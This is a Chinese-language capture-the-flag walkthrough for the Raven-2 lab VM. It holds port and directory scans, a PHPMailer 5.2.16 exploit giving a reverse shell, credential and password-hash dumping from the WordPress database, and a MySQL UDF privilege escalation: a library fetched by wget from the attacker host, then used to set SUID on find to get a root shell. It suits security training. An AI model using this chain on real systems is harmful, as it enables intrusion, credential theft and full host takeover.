Raven-2

端口扫描

nmap -sS -p- 192.168.56.105 -sV -A --version-all -sC

访问网站发现没什么可关注的点，点到blog的时候显示不可访问

这个时候就联想到了

本地/etc/hosts文件解析

就能正常访问了。。

目录扫描：

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.56.105

诶嘿，扫出了蛮多个目录的

在/vendor/PATH发现

第一个flag

在readme发现很多关于PHPMailer的信息

以及http://192.168.56.105/vendor/VERSION在这里面提示版本为5.2.16

我们随即便去查找一下相关的exp

利用msf下载exp

修改代码

依次修改可以发送邮件的路径，要定义的后门文件/shell.php,要回连的地址以及端口，还有网站的后门文件保存路径

python 40974.py

接着访问/contact.php触发后门文件再访问/shell.php就可以进行反弹shell。。。

建立交互式终端

python -c 'import pty;pty.spawn("/bin/bash")'

查找flag

find / -name flag* 

找到两个有关flags的信息

•  /var/www/flag2.txt
•  /var/www/html/wordpress/wp-content/uploads/2018/11/flag3.png

flag2

cat /var/www/flag2.txt

flag3

接着在wordpress目录发现数据库密码

用户名：root，密码：R@v3nSecurity

Mysql登录

mysql -uroot -pR@v3nSecurity

mysql> show databases;

+--------------------+ | Database           | +--------------------+ | information_schema | | mysql              | | performance_schema | | wordpress          | +--------------------+

mysql> use wordpress

mysql> show tables;

+-----------------------+ | Tables_in_wordpress   | +-----------------------+ | wp_commentmeta        | | wp_comments           | | wp_links              | | wp_options            | | wp_postmeta           | | wp_posts              | | wp_term_relationships | | wp_term_taxonomy      | | wp_termmeta           | | wp_terms              | | wp_usermeta           | | wp_users              | +-----------------------+

select * from wp_users;

michael    | BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0

steven     | B6X3H3ykawf2oHuPsbjQiih5iJXqad.

查看mysql的运行权限

是root权限在运行

ps -aux | grep mysql

MySql提权：UDF

show global variables like 'secure%';

+------------------+-------+ | Variable_name    | Value | +------------------+-------+ | secure_auth      | OFF   | | secure_file_priv |       | +------------------+-------+

•  1）当 secure_file_priv 的值为 NULL ，表示限制 mysqld 不允许导入|导出，此时无法提权
•  2）当 secure_file_priv 的值为 /tmp/ ，表示限制 mysqld 的导入|导出只能发生在 /tmp/目录下，此时也无法提权
•  3）当 secure_file_priv 的值没有具体值时，表示不对 mysqld 的导入|导出做限制，此时可提权! 如果是 MySQL >= 5.1 的版本，必须把 UDF 的动态链接库文件放置于 MySQL 安装目录下的 libplugin 文件夹下文件夹下才能创建自定义函数。

show variables like '%plugin%';

+---------------+------------------------+ | Variable_name | Value                  | +---------------+------------------------+ | plugin_dir    | /usr/lib/mysql/plugin/ | +---------------+------------------------+

use mysql

select user,host from user;

+------------------+-----------+ | user             | host      | +------------------+-----------+ | root             | 127.0.0.1 | | root             | ::1       | | debian-sys-maint | localhost | | root             | localhost | | root             | raven     | +------------------+-----------+

发现root用户不允许远程登录，所以不能使用MSF提权

searchsploit udf

gcc -g -c 1518.c

gcc -g -shared -Wl,-soname,exp.so -o exp.so 1518.o -lc

•  -g 生成调试信息
•  -c 编译（二进制）
•  -shared：创建一个动态链接库，输入文件可以是源文件、汇编文件或者目标文件。
• -Wl,-soname,exp.so
• -Wl 表示将后续参数传递给链接器（ld）。
• -soname,exp.so 设置动态库的 内部名称（SONAME），影响动态链接时的库查找行为。

•  -o：执行命令后的文件名
•  -lc：-l 库 c库名

python -m http.server 8080

wget http://192.168.56.103:8080/1518.so -O test.so

use mysql;

create table feng(line blob);

insert into feng values(load_file('/tmp/test.so'));

• outfile 多行导出，dumpfile一行导出

  select * from feng into dumpfile '/usr/lib/mysql/plugin/test.so';
  

(或者sys_exec)类型是integer，别名（soname）文件名字

create function do_system returns integer soname 'test.so';

select * from mysql.func;

select do_system('chmod u+s /usr/bin/find');

创建一个文件：touch feng

find / -name feng -exec "/bin/sh" ;

id uid=33(www-data) gid=33(www-data) euid=0(root) groups=33(www-data)

The end(获取flag)

cd /root

ls

cat flag4.txt  

flag4{df2bc5e951d91581467bb9a2a8ff4425}